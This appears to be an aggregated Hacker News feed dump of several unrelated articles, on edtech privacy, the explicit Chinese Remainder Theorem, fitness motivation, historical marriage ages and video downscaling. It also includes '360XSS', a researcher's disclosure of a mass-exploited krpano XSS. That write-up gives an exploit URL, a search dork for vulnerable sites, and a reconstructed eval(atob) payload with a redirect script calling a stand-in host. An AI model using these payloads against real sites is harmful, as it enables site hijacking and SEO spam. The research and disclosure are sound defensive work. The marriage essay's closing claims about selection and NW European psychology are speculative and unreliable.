    There's no way to verify that because ESA will not make the list, nor the ratings of assessed products, available. In fact, it declined to provide even an example report or summary statistics beyond the total number of assessments done.

    Despite the lack of transparency around specific evaluations, Dr Bunn sees ST4S — which does at least publish detailed documentation on their framework — as a marked improvement over departments and schools doing their own assessments. In a recent paper together with Associate Professor Luci Pangrazio from Deakin University, Dr Bunn looked extensively at ST4S and other processes run by education departments in Victoria, New South Wales and Western Australia.

    "Full [ST4S] assessment of the product is rigorous and detailed and can take up to six months," they write.

    "This differs markedly from practices in several states and schooling sectors, where edtech vendors are simply required to complete a questionnaire without necessarily providing supporting evidence."

    Is parents' consent really voluntary?

    "I wonder how voluntary the consent really is because one of the things they're supposed to specify in a collection notice is what are the consequences for you, and I guess in this case, your child, if you don't agree," said Dr Cohen.

    The consent form used by Queensland state schools does answer that question ... to a degree. It says that it is not compulsory for parents to provide consent and that not consenting "will not adversely affect any learning opportunities provided by the school to your child".

    It's hard to see what these educational apps bring to the classroom if students who aren't allowed to use them genuinely don't miss out on any learning opportunities. But even if that's plausible, parents and academics we spoke to pointed out that there could be social and emotional impacts for children whose parents withhold consent.

    Having previously withheld consent for these classroom apps, Kim Nguyen has come to the conclusion that by grade five her daughter was missing out on too much.

    [Photo: Kim Nguyen's daughter, a girl with long dark hair wearing a backpack, leaving for school. (ABC News: Esther Linder)]

    "So we basically said no to everything until this year, where it's almost like compulsory. And it's compulsory in the sense that if my daughter doesn't use it, she feels excluded from the class.

    "The problem is the kid will see another kid using it and they feel different."

    Is there a better way?

    Most parents the ABC spoke to said that ultimately they have to trust that the products chosen by schools are safe and effective learning tools, but were unsure if they could.

    Why, for instance, were they being asked for permission to share so many personal details with so many third parties when that didn't seem at all necessary to use the platforms in question?

    Researchers like Dr Bunn are pleased to see progress through initiatives like ST4S which has been evolving beyond a simple compliance exercise to a more sophisticated risk assessment approach taking into account issues like the commercial exploitation of children's data.

    Dr Bunn also points to recent changes to the Privacy Act, which task the OAIC with developing a Children’s Online Privacy Code, suggesting this might have some implications for edtech vendors.

    What would help parents?

    For busy parents, reading and understanding 200,000 words of dense legal text is still an all but impossible task.

    Education Services Australia has ideas about moving beyond just looking at risk to include ethical issues and educational impacts in their assessments, but unless it can make assessments public, that won't provide any useful guidance to parents.

    Among parents we spoke to there was a strong desire for clearer and more meaningful communication about the platforms their kids were using and what the benefits were.

    Parents make decisions every day about how their children use technology in the digital age; in some ways it's a never-ending task. But by asking parents to make these judgements while also withholding product assessments and ratings, education authorities seem to be making parents' lives harder than they need to be.

    You've made it to the end! 

    If you were Kim though, you'd be just 6 per cent through the ClassDojo documents. Then just another 19 apps (or 160,000 words) to go!


    ]]>
    https://www.abc.net.au/news/2025-02-27/classroom-apps-technology-kids-data-terms-conditions/104966952 hacker-news-small-sites-43204133 Fri, 28 Feb 2025 10:44:16 GMT
    <![CDATA[Turning my ESP32 into a DNS sinkhole to fight doomscrolling]]> thread link) | @venusgirdle
    February 28, 2025 | https://amanvir.com/blog/turning-my-esp32-into-a-dns-sinkhole | archive.org

    Unable to extract article]]>
    https://amanvir.com/blog/turning-my-esp32-into-a-dns-sinkhole hacker-news-small-sites-43204091 Fri, 28 Feb 2025 10:39:01 GMT
    <![CDATA[Explicit Chinese Remainder Theorem]]> thread link) | @boogiemath
    February 28, 2025 | https://boogiemath.org/notes/misc/notes-6.html | archive.org

    Let $p_i$ be coprime positive integers for $i = 1, \dots, K$. Let $a_i$ be an integer satisfying $0 \leq a_i < p_i$ for each $i$.

    The Chinese Remainder Theorem (CRT) provides a way to determine an integer $a$ such that:

    $a = a_1 \bmod p_1$

    $\vdots$

    $a = a_K \bmod p_K$

    To determine $a$, we proceed as follows. Define:

    $P = p_1 \cdots p_K$

    $P_i = \frac{P}{p_i}$

    $t_i = P_i^{-1} \bmod p_i$

    The value $a$ can be constructed as:

    $a = \sum_{i=1}^K t_i P_i a_i$

    It's clear that $a = a_i \bmod p_i$ because

    $t_i P_i a_i = 1 \cdot a_i = a_i \bmod p_i$

    and

    $t_i P_i a_i = 0 \bmod p_j \quad \text{for } i \neq j$

    The value $a$ is unique up to modulo $P$, but we do not know the integer $r$ for which:

    $r P \leq a < (r+1) P$

    For example, in lattice-based cryptography, the integer $a$ is sometimes represented as $(a_1, \dots, a_K)$ for performance reasons. However, at some point, one needs to reconstruct $a$ from $(a_1, \dots, a_K)$. In these cases, $|a| < P$ (in fact, $|a| < \frac{P}{2}$ because the values are centered around $0$). So, how can we reconstruct $a$?

    This is where the explicit CRT comes into play. Let's express $a$ a bit differently:

    $a = P \sum_{i=1}^K \frac{t_i}{p_i} a_i$

    We define $z$ (which is generally not an integer):

    $z = \sum_{i=1}^K \frac{t_i}{p_i} a_i$

    Let's define $u$ to be congruent to $a$, satisfying

    $u = a \bmod P, \quad 0 \leq u < P$

    It holds that:

    $P z = u + r P$

    $P (z - r) = u$

    If $|u| < \frac{P}{2}$, then $|z - r| < \frac{1}{2}$. That means:

    $r = \mathrm{round}(z)$

    So we can compute $u$ as:

    $u = P \cdot z - P \cdot \mathrm{round}(z)$
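
    To make this concrete, here is a minimal Python sketch (mine, not from the original note) that computes both the exact CRT lift and the explicit-CRT rounding trick; it assumes $|a| < \frac{P}{2}$ and moduli small enough that the floating-point $z$ stays accurate:

        from math import prod

        def explicit_crt(residues, moduli):
            """Recover a with |a| < P/2 from residues a_i = a mod p_i."""
            P = prod(moduli)
            a = 0     # exact CRT lift: sum of t_i * P_i * a_i (a big integer)
            z = 0.0   # the same sum divided by P, tracked in low precision
            for a_i, p_i in zip(residues, moduli):
                P_i = P // p_i
                t_i = pow(P_i, -1, p_i)  # modular inverse (Python 3.8+)
                a += t_i * P_i * a_i
                z += (t_i * a_i) / p_i
            # a equals P*z exactly, so subtracting P*round(z) centers the result
            return a - P * round(z)

        moduli = (3, 5, 7)                            # P = 105
        secret = -17                                  # |secret| < P/2
        residues = tuple(secret % p for p in moduli)  # (1, 3, 4)
        assert explicit_crt(residues, moduli) == secret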

    ]]>
    https://boogiemath.org/notes/misc/notes-6.html hacker-news-small-sites-43203708 Fri, 28 Feb 2025 09:46:44 GMT
    <![CDATA[Doing the impossible is easier than you think]]> thread link) | @mrccc
    February 28, 2025 | https://www.marcnitzsche.de/doing-the-impossible-is-easier-than-you-think/ | archive.org

    Here's how I did the impossible.

    I wanted to do 100 burpees in under 5 minutes. That’s 1 burpee (a pushup and squat jump) every 3 seconds. This is what doing it looked like in my head:

    In other words: it looked difficult. Hard. Basically impossible. The first time I tried, it took me almost 12 minutes and I nearly died with my lungs on fire.

    Over time, I pushed myself harder, got the time lower, and improved. In the span of weeks, I got it down to just under 7 minutes (still nearly dying of exhaustion every time). It seemed like I was improving, and the difficulty went down:


    But one thing remained clear: doing 100 burpees in 5 minutes was still super close to impossible.

    This changed when I saw a video of someone doing it in 3 minutes and 33 seconds.

    I thought 5 minutes was otherworldly and difficult. Then this guy did it in almost half the time! I was outraged!! 5 minutes was supposed to be hard, but this guy did even better!

    So reluctantly my mind updated its estimate. If he could do it in 3:33, it couldn’t be that hard to do it in 5:00. Must be much easier than I thought:


    The next day, I did what I thought was impossible: 100 burpees in 4:59.

    Just because I watched a damn video.

    Your beliefs determine the difficulty

    Everything has a true difficulty (how hard it actually is for you). But you experience the difficulty based on your beliefs.

    It’s personal (because something that might be trivial for you might be extremely hard for me). And of course, it changes over time as you improve (e.g. body adapting after exercising, so next time it’s easier).

    For the burpees, the difficulty spectrum might have looked something like this:


    So actually, it should've been easier than I thought. The green arrow was always there – while my expectations, the red arrow, moved around. But the difficulty I experienced was still as big as what I believed it to be:


    That means I experienced more difficulty than was necessary!


    To put it another way: Things are at least as hard as you think they are.

    There's almost no upper limit to how hard something is for you, only a lower limit. The difficulty you experience is always at least the true difficulty, and after that only depends on your beliefs.


    If you expect the difficulty to be higher, you’ll experience more of it.

    The Magic Threshold Of Possibility

    Of course there are cases where you expect the difficulty to be very high and then you “just do it” and it wasn’t as bad as you thought it would be.


    I think this happens when the true difficulty and the expected difficulty are too far apart from each other. And once you try, you immediately realize that your expectation was wrong.

    The problem is that the expectation can also be too high. This is when something seems so hard you don't even try. It's above your Magic Threshold of Possibility because it's too close to impossibility:


    It's like the parable of the eagle hatching in a chicken's nest. It grows up believing it’s a chicken and that chicken can’t fly. So it comes to believe that it cannot fly either. It’s happy flapping its wings, but it never soars.

    Don’t be that eagle!

    How to update your difficulty

    But then how do you change your expected difficulty?

    The expected difficulty is a belief about yourself and the world. You use it to make predictions about the future and use those predictions to determine your actions. But the belief could be wrong, which would make your predictions and actions wrong.

    Here are some ways to make those beliefs more accurate.

    Studying and trying

    By studying the problem and other people’s accomplishments (like watching the 3:33 burpees video), you can quickly update your beliefs if they differ too much from reality. What one person can do, another can do too.

    Another way to change your belief is to just do it, to try and test it. If it shows that your belief is wrong, you’ve effectively changed it and reduced the expected difficulty.

    This works both ways – if you expect something to be too easy, then learning about it and trying will bring you closer to its true difficulty.


    Increasing the difficulty

    Paradoxically, increasing the difficulty (e.g., choosing a harder goal) can decrease the difficulty of the thing you originally wanted to do.


    If I update my goal from 5 minutes to 3:33, then 5 minutes feels like just another little milestone along the way. It's not as significant anymore. In my mind, what's really hard now is the new goal, and everything else is just a step along the way.

    Introspection

    You can challenge your belief about the difficulty by thinking from the opposite direction. Sometimes you don't even entertain the thought that your life could be... well, easier. So just ask:

    What would this look like if it were easy?

    ...and see what you come up with.


    Your beliefs shape your reality

    The truly difficult thing to realize is how many things in life this applies to. It's pretty obvious with goals you set for yourself, because goals, almost by definition, are "attainable," even if they seem difficult.

    But what about all the things that you don’t even think about because you subconsciously dismiss them as “too impossible”? The problem is that those things aren’t visible to your conscious mind. Because as the lens through which you see the world, your beliefs filter them out.

    What else are you secretly capable of, but too scared to attempt? Maybe the real limit isn’t your ability. It’s your beliefs.



    ]]>
    https://www.marcnitzsche.de/doing-the-impossible-is-easier-than-you-think/ hacker-news-small-sites-43203528 Fri, 28 Feb 2025 09:21:50 GMT
    <![CDATA[People did not used to marry early in the good old times]]> thread link) | @MrBuddyCasino
    February 28, 2025 | https://www.emilkirkegaard.com/p/people-did-not-used-to-marry-early | archive.org

    If you look at a plot of age of first marriage and age of first birth (usually following marriage), you might get the idea that the 1960s cultural revolution, feminism or general leftism have caused a historically unique delay in childbearing:

    However, this is not actually true. Despite what you might have heard about marrying at 20 or whatever in Victorian England, this was not the norm. The misperception may result from people consuming media relating to upper class or nobility/royal marriages, which were earlier and more often arranged for political reasons. Here's a long time series for marrying in England and Wales:

    There are two problems with the figure. First, it concerns all marriages not just the first. Probably most marriages were first marriages given the culture and law surrounding divorce, but some were not. Second, even if marriage was earlier, first child was not necessarily immediately after marriage. The authors explain the relevance of the findings:

    Relatively late marriage in Britain and across a swath of North-West Europe is linked to something called the ‘European Marriage Pattern’. The key characteristic of this is that young couples usually set up a new household on marriage.

    Establishing a new household involved the considerable expense of purchasing the cooking pots, blankets and tools they would need to equip their new home, and consequently both men and women would spend their late teens and early twenties earning money and saving some of it in preparation for marriage. Sometimes they would continue to live with their parents while doing this, but it was quite common to take a position as a domestic or farm servant which involved lodging with their employer.

    This process of working and saving pushed marriage ages into the mid-twenties for both men and women. It also had the effect of making marriage responsive to the economy, as when wages were low it took longer to save for marriage, but when wages were high people were able to marry a bit earlier. In this way the long fluctuations in marriage age until about 1750 have been attributed to extended economic cycles.

    The period referred to as the industrial revolution was characterised by a large increase in factory labour, and the comparatively high wages of factory work, together with the security it offered, meant that people could afford to marry at younger ages.

    This (NW) European Marriage Pattern is the same thing as the Hajnal line map (named after John Hajnal, a Hungarian Jew; curiously, a German Nazi called Werner Conze came up with it before him):

    So comparatively late marriage is not a new thing, it is the old thing. We don't know exactly how old, but the British data above suggests at least since the 1500s.

    What about age of first birth specifically? Here is some comparative data:

    Between the 7 countries, they don't even have the same lowest point. It looks like Russia reached its minimum only after the fall of communism around 1995, while the USA reached it already in 1960, and Sweden in 1972 (though it's hard to say for sure). Here's another time series with different countries for first marriages:

    Concerning again marriage, here's Danish marriage data by first vs. all:

    Helpfully, this time we have first marriages. Denmark reached its low point in 1967, whereas only 100 years ago, the average first marriage age for men was 28 and 25 for women. Helpfully, I found a matching time series for age of mothers:

    The one datapoint from 1850 comes from a detailed study of a regional church's notes, and should be roughly representative of Denmark at the time. Assuming it is, we can see that though Danish women may have married first at around 23, their first child was usually around 26. And in 1850, the age of first birth was about the same as the modern values.

    I also found marriage data for USA directly from the censuses:

    Again, we see that the lowest point is around 1960, whereas in 1890, the age for women was the same as in 1980 (22, still quite young), and 26 for men (same as in 1990). The USA is clearly an outlier compared to the European nations, which probably has something to do with settler and migration culture (marry and move to the USA, or move to the USA and marry someone quickly). Note also that the USA has abnormally low first marriage ages for women in the 1800s (in the plot with 9 countries).

    It is surprisingly difficult to find these historical time series, since almost all the research one finds when searching for "age at first birth" consists of medical studies that seek to show it is associated with negative outcomes. Similarly, one can look between countries and get the same result. This suggests to readers that delayed childbirth is good (and lower fertility is good, hence the pressure on poor countries to adopt fertility reductions). Actually, until recently, early marriage was associated with stronger economic growth:

    A decrease followed by an increase in the age of marriage was observed in the twentieth century in all advanced economies. This stylized fact is intriguing because of the non-monotonic relationship between age of marriage and economic growth. Today, a high level of economic development is associated with late marriage, but for most of the twentieth century the opposite was true: economic growth was associated with early marriage. Studies published around the middle of the century document the trend toward an earlier marriage. For example, Newcomb (1937) writes with respect to the United States that

    “Today the prospect of marriage and children is popular again; 60 percent of the girls and 50 percent of the men would like to marry within a year or two of graduation… boys and girls tend to take it for granted that they will be married, as they did not a decade ago.”

    Almost 35 years later, Dixon (1971) writes that

    “The trend away from the ‘European’ pattern is most obvious in the wealthier nations of the West, especially in the English-speaking nations overseas and in England, France, Belgium and parts of Scandinavia. These are also countries with increasingly assertive and independent youth who are taking advantage of the opportunities to marry young that the wealthy and secure economies provide.”

    The decades that followed have shown that the downward trend in the age of marriage was temporary. The age at first marriage has climbed sharply since the 1960s in the United States and advanced parts of Europe and since the 1970s and 1980s also in Southern Europe and Ireland. This upward trend reached the former Communist Eastern European countries in the 1990s.

    This delayed marriage pattern in NW Europeans was because of neolocalism, the cultural pattern that newlyweds move out to a new place. Since buying or renting a place required first establishing a career, this caused some delay. However, it also caused a selection effect, as not everybody could succeed in this game. Hence, we see relatively large numbers of childless women (20-25%), which is not seen in historical data from other civilizations. Thus, plausibly, neolocalism is associated with faster natural selection for traits allowing people to succeed in this game, that is, human capital. Furthermore, because people didn't live with their relatives, they were more geographically mobile and could move somewhere else to pursue a more gainful career (for the man, usually). This should result in higher economic efficiency. Combined with the avoidance of cousin marriages, this would also tend to make people less inbred and less nepotistic. These patterns together probably explain the unique psychological package found in NW Europeans.


    ]]>
    https://www.emilkirkegaard.com/p/people-did-not-used-to-marry-early hacker-news-small-sites-43203127 Fri, 28 Feb 2025 08:21:49 GMT
    <![CDATA[Show HN: Bluesky has no built-in analytics so I created them]]> thread link) | @danilofiumi
    February 27, 2025 | https://www.caterpace.blue/index/ | archive.org

    Consistency Is the Key. You heard that, didn't you?

    Are you struggling to build an audience? You’re not alone. The problem isn’t always the quality of your content—it’s the lack of consistency, and that’s due to 👇

    Algorithms: They favor regular activity over sporadic activity, and audiences gravitate toward creators they can rely on

    Engagement: When you post regularly, you build anticipation and loyalty, encouraging your audience to keep coming back.

    Tracking: Without monitoring your progress, it’s easy to lose consistency and miss growth opportunities.

    ]]>
    https://www.caterpace.blue/index/ hacker-news-small-sites-43202269 Fri, 28 Feb 2025 06:10:34 GMT
    <![CDATA[360XSS: Mass Website Exploitation via Virtual Tour Framework for SEO Poisoning]]> thread link) | @timkq
    February 27, 2025 | https://olegzay.com/360xss/ | archive.org

    How I Accidentally Uncovered One of the Most Exploited XSS Vulnerabilities Online

    My story begins in a way that many readers of technical blogs might find familiar—just another uneventful evening alone at the computer. For purely educational purposes, I opened a Chrome incognito window, went to Google, and typed the word “porn.” Thanks to my ongoing research in this area, I’m quite familiar with the usual search results. But this time, something unusual caught my eye—a new website appearing in the third row, listed under Yale University’s domain with the title: “++[S*X@Porn-xnxx-Videos!…] Tamil sexy student.” It piqued my curiosity, but not for the reasons you might think.

    Did Yale University Enter the Porn Industry?

    I was almost certain the website had been hacked, but I still wasn’t sure how. My first thought was a subdomain takeover—a common attack where an abandoned CNAME record pointing to an unused asset gets hijacked by an attacker to host malicious content under the original domain. I had previously explored this technique in my research at Guardio, where I coined the term “Subdomailing”.

    To test my theory, I clicked the link to see where it would take me. The page initially loaded what looked like a legitimate platform but quickly redirected me to a random porn ad.

    https://virtualtour.quantuminstitute.yale.edu/?id=yuxs&xml=https://staging-prep-cms.scouts.org.uk/lnk/video/?video=video-xx-indain-girl-xxx-xxxxxxx-xvid-60159.html

    Examining the original URL, a few things stood out: the subdomain name hinted that the site was related to a virtual tour, and an xml parameter contained a suspicious-looking URL—something that definitely needed a deeper look.

    Curious, I tried opening the same URL again but without the parameters—and suddenly, I found myself inside Yale’s Quantum Mechanics Institute. Took a quick tour, impressive place. If you're into quantum computing, worth a look. But honestly, I never really got superposition—how can a bit be both 0 and 1? Seriously, how does that work?? 😂

    …Anyway, back to the point.

    Reversing the Payload

    The xml parameter was clearly the key factor, so I considered the possibility of an open redirect. I modified the parameter value to https://www.example.com, expecting a redirection—but instead, the page threw an error:

    At that point, I knew this was more than just a simple redirect. I hadn’t even checked the original xml parameter yet—and when I did, one thing stood out: the URL belonged to the official UK Scouts website, which seemed suspicious. A quick DNS check confirmed my suspicion—the subdomain had been hijacked through an abandoned Azure account, just as I had explained earlier.

    Then, I examined the response contents of the URL to see what was inside:

    The response was an XML document with an onloaded event containing an eval function executing a Base64-encoded payload—one of the most classic indicators of a malicious XSS (Cross-Site Scripting) payload.

    At that moment, I felt a rush of excitement—this was the first time I had found an actively exploited XSS in the wild. Don’t get me wrong—I strongly oppose malicious activities like this, but the researcher in me couldn’t help but celebrate 😂.

    Beyond the XSS, the main tag <krpano> revealed the underlying technology powering my virtual tour through the quantum institute.

    💡

    Krpano is a popular framework used to host 360° images and videos, enabling the creation of interactive virtual tours and VR experiences. It supports various formats, including gigapixel images and fisheye projections, and allows customization through XML and JavaScript.
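
    For orientation, a benign krpano tour is usually just a small XML file along these lines (a minimal, hypothetical example built from documented krpano elements, not taken from the post):

        <krpano version="1.20">
            <!-- the 360-degree source image for the tour -->
            <image>
                <sphere url="pano.jpg" />
            </image>
            <!-- initial camera orientation and field of view -->
            <view hlookat="0" vlookat="0" fov="90" />
        </krpano>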

    That meant the XSS was either in the framework itself or in the website’s implementation.

    Curious to understand what the payload actually did, I decoded it:

    Nothing particularly sophisticated stood out in the script—except that it fetched a target URL from yet another stolen asset, this time volvo.com, and used the id parameter to identify the ad campaign.
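
    Putting the pieces together, the attack XML presumably had roughly this shape (a hypothetical reconstruction; the real domains and code were only visible in the screenshots, so only the mechanics described above are assumed):

        <!-- attacker-hosted XML, loaded via the ?xml= parameter -->
        <krpano onloaded="js( eval(atob('...base64 payload...')) );">
        </krpano>

    And the decoded script would have done something along these lines:

        // reconstruction: resolve the campaign target, then redirect
        const id = new URLSearchParams(location.search).get("id");  // ad campaign id
        fetch("https://stolen-subdomain.example/ads?c=" + id)       // hijacked asset
            .then(r => r.text())
            .then(target => { window.location.href = target; });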

    At this point, I hadn’t even fully started my investigation, and I had already found three abused assets from three major organizations. That’s when I realized—this wasn’t just some random hacker selling services on Telegram. I was dealing with a serious actor—someone with a massive bank of stolen assets and a well-organized operation.

    Zero Day or One Day? 

    Reversing this XSS was a fun ride. At first, I assumed the external XML loading was an intended feature of the Krpano library and that the vulnerability lay in how the XML was parsed. So, I dived into debugging the obfuscated library, searching for the source of truth. After 30 minutes of digging, I finally did what I should’ve done from the beginning—checked the documentation. And there it was:

    The XML onloaded attribute? A documented feature.
    The external xml parameter? A design choice - one that should be disabled in production.

    I came across a crucial configuration setting - passQueryParameter.

    This setting controls whether query parameters from the hosting website are directly passed into Krpano's configuration. The problem? For years it was enabled in Krpano's default installation, meaning any attacker could inject arbitrary XML, leading to reflected XSS on any website that didn't explicitly disable it.
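
    As a sketch of the fix on the embedding side (my own example around krpano's documented embedpano() call; check your version's docs for the exact option spelling, which the post gives as passQueryParameter):

        <script src="tour/pano.js"></script>
        <div id="pano"></div>
        <script>
            embedpano({
                target: "pano",
                xml: "tour.xml",            // fixed, trusted XML, never taken from the URL
                passQueryParameters: false  // don't forward ?xml=... into krpano
            });
        </script>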

    Digging deeper, I found CVE-2020-24901. The description matched exactly what I observed: reflected XSS caused by the passQueryParameter setting. While the original POC used different parameters, the xml parameter was also mentioned. So, was this a one-day? Yes. But somehow, it slipped past too many websites, as you're about to see.

    The Shoemaker's Children Go Barefoot

    In this Krpano forum thread, a user raised concerns about this CVE—a full year after its disclosure. Krpano’s developers downplayed the issue, claiming it was a case of misuse rather than a security flaw. However, they did mention that as of version 1.20.10, they restricted passQueryParameter to an allowlist in an attempt to prevent XSS.

    But here’s the problem.

    Explicitly adding the xml parameter to the allowlist still left the same XSS risk open, and this configuration remained available for use.

    And now, for the best part.

    While browsing Krpano's documentation, I noticed they hosted live examples of their 360° tour framework on their own website. Naturally, I checked their implementation… and guess what? They were vulnerable too.

    Once I cracked the technical side of the vulnerability, I shifted gears—I wanted to understand the bigger picture. How widespread was this campaign? How many other sites had been exploited? That’s when an idea hit me. Instead of chasing leads blindly, why not use my good old friend, Google Dorking?

    inurl:xml=https AND inurl:id=

    And just like that, I opened the Pandora box.

    The sheer scale of this campaign caught me off guard. With a couple of Google searches, I uncovered thousands of ads spread across 350+ exploited websites—and not just any websites.

    Government portals. Entire state websites. Top universities in America. Major hotel chains. News outlets. Car dealerships. Fortune 500 companies. All hijacked and repurposed as SEO tools to spread spam, ads, and shady promotions.

    Most of these sites were very popular, with millions of visitors each month, and some had been hit multiple times, serving different types of ads.

    And it wasn’t just porn ads anymore. I found diet supplements, online casinos, fake news sites—every kind of sketchy ad we instinctively close without a second thought. But the real surprise? Some of these hijacked pages weren’t even pushing ads—they were being used to boost YouTube views.

    This wasn’t just a spam operation. It was an industrial-scale abuse of trusted domains.

    I also analyzed the xml parameter value. Some were the usual suspects: cheap, throwaway domains registered with privacy-shielded WHOIS info, making it impossible to trace the owners. But others? Hijacked subdomains of major websites.

    XSS for SEO Poisoning 

    Everything about this campaign screamed SEO pros. One of the biggest proofs was right at the beginning of this blog—where I showed how they pushed their ad to the third row in Google search results for one of the most searched terms in the world: "porn". Sure, leveraging Yale University’s domain played a big role in boosting credibility, but pulling off that level of ranking manipulation is still no small feat. 

    In addition to that, the concept itself, a reflected XSS promoted through search results, is nothing I’ve seen before, not at this scale. A reflected XSS is a fun vulnerability, but on its own it requires user interaction, and one of the biggest challenges is getting people to click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it.

    These guys squeeze every last drop out of every website they compromise. Take Utah’s official website, for example—at the time of my search, it had over 100 indexed spam results.

    And keep in mind, my data was limited to Google Dorks, meaning they had likely indexed the same page with different ads hundreds of times beyond what I could see.

    They weren’t just injecting links—they were optimizing them:

    • Controlled the title, description, and preview image.
    • Used random strings in titles to make each result unique.
    • Added fake review counts and star ratings.

    I can’t accurately estimate how many clicks this campaign generated, but judging by its scale, millions wouldn’t be a stretch. 

    But there was still one question that kept bugging me… 

    For some reason, I always assumed that the best way to exploit an XSS was to directly attack the vulnerable website and its user base—stealing cookies, session tokens, or performing actions on behalf of users. However, in this case, all I found was JavaScript executing simple redirects and nothing more 🤔.

    Thinking logically, I came up with two possible reasons why they chose this approach:

    1. They're likely a shady ad firm, more interested in blasting ads everywhere than launching direct cyberattacks. This is probably their most effective monetization strategy.
    2. They’re operating in a legal gray area—while their methods are unethical, they aren't outright criminal. If they stole user data or launched full-fledged attacks, it would escalate the operation into something that attracts law enforcement and investigations. However, all they did was distribute ads.

    But then, while digging through the scraped websites, I stumbled upon something bigger—a website with over half a billion monthly visitors that was treated specially.

    CNN - More Than a Redirect

    This wasn’t just another case of a high-traffic website being compromised. What made it stand out? Clicking the malicious link didn’t redirect me elsewhere—it kept me right on cnn.com, landing on what appeared to be a legitimate CNN article. Same domain, same structure—except the content was in Turkish and the title was “Top Reliable Casinos Online.”

    Who wouldn’t trust an article hosted on CNN, especially when hunting for the most “reliable” online casino?

    This was a smoking gun—proof the attackers knew exactly what they had in their hands. Instead of a cheap redirect, which would be a waste, they embedded their casino promotion directly inside CNN’s domain, disguising it as a real article. They weren’t just hijacking traffic; they were weaponizing trust.

    Digging deeper, the xml payload was hosted on this “unsuspicious” domain "jqeury.store". The homepage on that domain served a list of links to multiple instances of the same CNN exploit, each serving different variations of the casino article.

    But it didn’t stop there. Some links also pointed to "geo.tv"–Pakistan’s largest news site. Opening them revealed the same trick—fake articles injected into a vulnerable endpoint, all promoting the same casino.

    Responsible Disclosure

    The people behind this campaign remain a mystery, but from what I’ve seen, many clues suggest it was run by an Arab group—based on the ads, patterns, and random breadcrumbs I found during my investigation. Either way, I couldn’t care less; that’s a problem for law enforcement. What I can do, however, is try to minimize the damage by reaching out to the biggest brands affected.

    I set out to report as many exploited instances as possible. What I didn’t anticipate was just how difficult that would be. I personally uncovered over 300 exploited domains, yet most had no vulnerability disclosure program. Hours went into tracking down contact emails and submission forms, but most of my reports went nowhere—buried in unread inboxes or bounced back with no response.

    Still, there were wins. Some reports made it through, earning me acknowledgements from major organizations like U.S. Department of Health & Human Services and CERT-EU. A handful of vulnerable assets even got fixed—some thanks to my disclosures, others by sheer coincidence.

    That’s when I decided to start my own blog—to shed light on overlooked attack vectors and reach a wider audience. If there’s one thing this experience reinforced, it’s that these problems extend far beyond a handful of exploited domains—and they don’t get fixed until someone makes enough noise.

    Krpano’s Response

    Alongside my reporting mission, I reached out to Krpano’s developers to highlight the vulnerable implementation on their own website and raise concerns about the handling of the XML parameter. The library’s main developer, Klaus, responded promptly and professionally, taking my report seriously. Within a few weeks, he implemented a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter—effectively closing off this attack vector.

    Big kudos to Klaus 👑

    360XSS: How to Fix It?

    🔍 Identify all instances of Krpano on your website.
    ⬆️ Update to the latest version 1.22.4.
    ❌ Set the passQueryParameter configuration to false.
    🔍 Scan for SEO Poisoning – Find and remove infected pages via Google Search Console.

    Stay Safe 💪🏻
    ]]>
    https://olegzay.com/360xss/ hacker-news-small-sites-43202198 Fri, 28 Feb 2025 06:01:04 GMT
    <![CDATA[Kindness Is Achievement: The Surprising Value of GPT-4.5]]> thread link) | @amoy-tech
    February 27, 2025 | https://amoy-tech.com/blog/id/5970 | archive.org

    Kindness is Achievement: The Surprising Value of GPT-4.5 @安美科技
    ]]>
    https://amoy-tech.com/blog/id/5970 hacker-news-small-sites-43202067 Fri, 28 Feb 2025 05:34:57 GMT
    <![CDATA[Video encoding requires using your eyes]]> thread link) | @zdw
    February 27, 2025 | https://redvice.org/2025/encoding-requires-eyes/ | archive.org

    In multimedia, the quality engineers are optimizing for is perceptual. Eyes, ears, and the brain processing their signals are enormously complex, and there’s no way to replicate everything computationally. There are no “objective” metrics to be had, just various proxies with difficult tradeoffs. Modifying video is particularly thorny, since like I’ve mentioned before on this blog there are various ways to subtly bias perception that are nonetheless undesirable, and are impossible to correct for.

    This means there’s no substitute for actually looking at the results. If you are a video engineer, you must look at sample output and ask yourself if you like what you see. You should do this regularly, but especially if you’re considering changing anything, and even more so if ML is anywhere in your pipeline. You cannot simply point at metrics and say “LGTM”! In this particular domain, if the metrics and skilled human judgement are in conflict, the metrics are usually wrong.

    Netflix wrote a post on their engineering blog about a “deep downscaler” for video, and unfortunately it’s rife with issues. I originally saw the post due to someone citing it, and was incredibly disappointed when I clicked through and read it. Hopefully this post offers a counter to that!

    I’ll walk through the details below, but they’re ultimately all irrelevant; the single image comparison Netflix posted looks like this (please ‘right-click -> open image in new tab’ so you can see the full image and avoid any browser resampling):

    [Image: downscaler output comparison]

    Note the ringing, bizarre color shift, and seemingly fake “detail”. If the above image is their best example, this should not have shipped – the results look awful, regardless of the metrics. The blog post not acknowledging this is embarrassing, and it makes me wonder how many engineers read this and decided not to say anything.

    The Post

    Okay, going through this section by section:

    How can neural networks fit into Netflix video encoding?

    There are, roughly speaking, two steps to encode a video in our pipeline:

    1. Video preprocessing, which encompasses any transformation applied to the high-quality source video prior to encoding. Video downscaling is the most pertinent example herein, which tailors our encoding to screen resolutions of different devices and optimizes picture quality under varying network conditions. With video downscaling, multiple resolutions of a source video are produced. For example, a 4K source video will be downscaled to 1080p, 720p, 540p and so on. This is typically done by a conventional resampling filter, like Lanczos.

    Ignoring the awful writing[1], it’s curious that they don’t clarify what Netflix was using previously. Is Lanczos an example, or the current best option[2]? This matters because one would hope they establish a baseline to later compare the results against, and that baseline should be the best reasonable existing option.

    2. Video encoding using a conventional video codec, like AV1. Encoding drastically reduces the amount of video data that needs to be streamed to your device, by leveraging spatial and temporal redundancies that exist in a video.

    I once again wonder why they mention AV1, since in this case I know it’s not what the majority of Netflix’s catalog is delivered as; they definitely care about hardware decoder support. Also, this distinction between preprocessing and encoding isn’t nearly as clean as this last sentence implies, since these codecs are lossy, and in a way that is aware of the realities of perceptual quality.

    We identified that we can leverage neural networks (NN) to improve Netflix video quality, by replacing conventional video downscaling with a neural network-based one. This approach, which we dub “deep downscaler,” has a few key advantages:

    I’m sure that since they’re calling it a deep downscaler, it’s actually going to use deep learning, right?

    1. A learned approach for downscaling can improve video quality and be tailored to Netflix content.

    Putting aside my dislike of the phrase “a learned approach” here, I’m very skeptical of the “tailored to Netflix content” claim. Netflix’s catalog is pretty broad, and video encoding has seen numerous attempts at content-based specialization that turned out to be worse than focusing on improving things generically and adding tuning knobs. The encoder that arguably most punched above its weight class, x264, was mostly developed on Touhou footage.

